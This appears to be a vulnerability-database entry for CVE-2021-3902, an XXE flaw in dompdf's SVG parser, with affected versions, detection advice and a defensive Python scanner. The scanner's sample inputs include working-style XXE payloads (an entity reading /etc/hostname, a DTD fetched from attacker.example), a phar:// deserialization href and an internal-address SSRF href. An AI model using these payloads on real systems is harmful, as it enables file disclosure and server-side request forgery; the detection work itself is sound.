cbcvebase.
CVE-2021-3902
published 2024-11-15


Priority: P356 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.92% (55.9th percentile)
An improper restriction of external entities (XXE) vulnerability in dompdf/dompdf's SVG parser allows for Server-Side Request Forgery (SSRF) and deserialization attacks. This issue affects all versions prior to 2.0.0. The vulnerability can be exploited even if the isRemoteEnabled option is set to false. It allows attackers to perform SSRF, disclose internal image files, and cause PHAR deserialization attacks.

Affected (4 ranges)

Vendor          Product         Version range               Fixed in
debian          php-dompdf      < 2.0.2+dfsg-1 (bookworm)   2.0.2+dfsg-1 (bookworm)
dompdf          dompdf          >= 0, < 2.0.0               2.0.0
dompdf          dompdf_dompdf   >= unspecified, < 2.0.0     2.0.0
dompdf_project  dompdf          < 2.0.0                     2.0.0

Detection & IOCs (extracted from sources)

  • The XXE in dompdf's SVG parser is exploitable even when isRemoteEnabled is set to false. Detection logic and hardening checklists must not treat that option as a mitigation for this issue; the fix is upgrading to 2.0.0 or later.
  • Monitor for SSRF originating from dompdf SVG parsing: unexpected outbound HTTP requests or local file reads triggered during PDF rendering.
  • Monitor for PHAR deserialization attempts triggered via dompdf SVG parsing: look for the phar:// stream wrapper in file paths passed to dompdf.
  • Monitor for XXE payloads in SVG content submitted to dompdf: DOCTYPE declarations with external entities that reference internal file paths or remote URLs.
  • All dompdf versions prior to 2.0.0 are affected; the Debian-tracked fix is in version 2.0.2+dfsg-1 for bookworm/sid.
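The indicator patterns above can be checked on the raw SVG before it ever reaches the renderer. The scanner below is an added example written for this page, not dompdf's own code and not a dompdf API. It is a plain text scan rather than an XML parse, so it never resolves anything it finds, and it reports external DTD references, external and parameter entity declarations, and href attributes that use a remote scheme or a local stream wrapper such as phar:// or file://. The allowlisted W3C SVG 1.1 DTD URI, the scheme lists and the three-tier policy in classify() are design assumptions; the sample SVG documents are constructed for the demo, not captured payloads.

```python
"""Pre-render scanner for the XXE / SSRF / phar:// indicators listed for
CVE-2021-3902. Added example, not dompdf code. Text scan only: nothing
it matches is ever fetched or expanded."""
import re
from dataclasses import dataclass

# Schemes that leave the document: remote fetch (SSRF) or local file /
# stream-wrapper access (file disclosure, phar:// deserialization).
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "gopher"}
LOCAL_SCHEMES = {"file", "phar", "php", "glob", "zip", "compress.zlib"}
# Assumption: the stock W3C SVG 1.1 DOCTYPE emitted by common editors is
# not an indicator by itself; any other external DTD reference is reported.
KNOWN_SVG_DTDS = {"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"}

Q = r"""(?:"([^"]*)"|'([^']*)')"""      # quoted literal, either quote style
PUB = r"""(?:"[^"]*"|'[^']*')"""         # public id, not captured
EXTERNAL_DTD_RE = re.compile(
    r"<!DOCTYPE\s+[\w.:-]+\s+(?:SYSTEM\s+" + Q + r"|PUBLIC\s+" + PUB + r"\s+" + Q + ")", re.I)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([\w.:-]+)\s+(?:SYSTEM\s+" + Q + r"|PUBLIC\s+" + PUB + r"\s+" + Q + ")", re.I)
HREF_RE = re.compile(r"(?:xlink:)?href\s*=\s*" + Q, re.I)
SCHEME_RE = re.compile(r"^\s*([a-z][a-z0-9+.\-]*):", re.I)


@dataclass(frozen=True)
class Finding:
    kind: str    # external-dtd | external-entity | parameter-entity | href
    target: str  # the URI involved
    scheme: str  # lower-cased URI scheme, "" for relative / fragment refs


def uri_scheme(uri: str) -> str:
    m = SCHEME_RE.match(uri)
    return m.group(1).lower() if m else ""


def _first(groups) -> str:
    """First alternative of a quoted-literal group that actually matched."""
    return next((g for g in groups if g is not None), "")


def scan_svg(text: str) -> list[Finding]:
    """Return every XXE / SSRF / phar:// indicator found in an SVG document."""
    findings = []
    for m in EXTERNAL_DTD_RE.finditer(text):
        uri = _first(m.groups())
        if uri not in KNOWN_SVG_DTDS:
            findings.append(Finding("external-dtd", uri, uri_scheme(uri)))
    for m in ENTITY_RE.finditer(text):
        kind = "parameter-entity" if m.group(1) else "external-entity"
        uri = _first(m.groups()[2:])          # skip the '%' flag and the name
        findings.append(Finding(kind, uri, uri_scheme(uri)))
    for m in HREF_RE.finditer(text):
        uri = _first(m.groups())
        scheme = uri_scheme(uri)
        # data: URIs, fragments (#id) and relative paths are the normal case
        # for SVG images; only references that leave the document count.
        if scheme in REMOTE_SCHEMES or scheme in LOCAL_SCHEMES:
            findings.append(Finding("href", uri, scheme))
    return findings


def classify(text: str) -> str:
    """Policy for an upload / render pipeline (assumed tiers):
    block  : any DTD entity construct (the path that isRemoteEnabled=false
             does not close) or a phar:// / file:// style local reference
    review : only remote http(s)-style hrefs, the surface isRemoteEnabled gates
    allow  : nothing of the above"""
    findings = scan_svg(text)
    if any(f.kind != "href" or f.scheme in LOCAL_SCHEMES for f in findings):
        return "block"
    return "review" if findings else "allow"


# Constructed sample documents (illustrative patterns, not captured payloads).
BENIGN_SVG = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10">
  <rect width="10" height="10" fill="#09f"/>
  <image xlink:href="data:image/png;base64,iVBORw0KGgo=" width="4" height="4"/>
</svg>"""
XXE_SVG = """<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY secret SYSTEM "file:///etc/hostname">
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
  %ext;
]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&secret;</text></svg>"""
PHAR_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="phar:///var/www/uploads/avatar.jpg/x.png" width="1" height="1"/>
</svg>"""
REMOTE_SVG = """<svg xmlns="http://www.w3.org/2000/svg">
  <image href="http://10.0.0.5:8080/internal/status.png" width="1" height="1"/>
</svg>"""

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_SVG), ("xxe", XXE_SVG),
                      ("phar", PHAR_SVG), ("remote", REMOTE_SVG)]:
        print(f"{name:7s} -> {classify(doc):6s} {scan_svg(doc)}")
```

The split between "block" and "review" mirrors the page's point: a remote image href is the surface that isRemoteEnabled=false is designed to gate, whereas an entity declaration in the DTD reaches the parser regardless of that option, so it is rejected outright. The scanner is a stop-gap for inputs you cannot yet route through a fixed build; it does not replace upgrading to dompdf 2.0.0 or later.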

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v3.0      9.8     CRITICAL   CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
osv             -         9.8     CRITICAL   -
vendor_debian   -         9.8     CRITICAL   -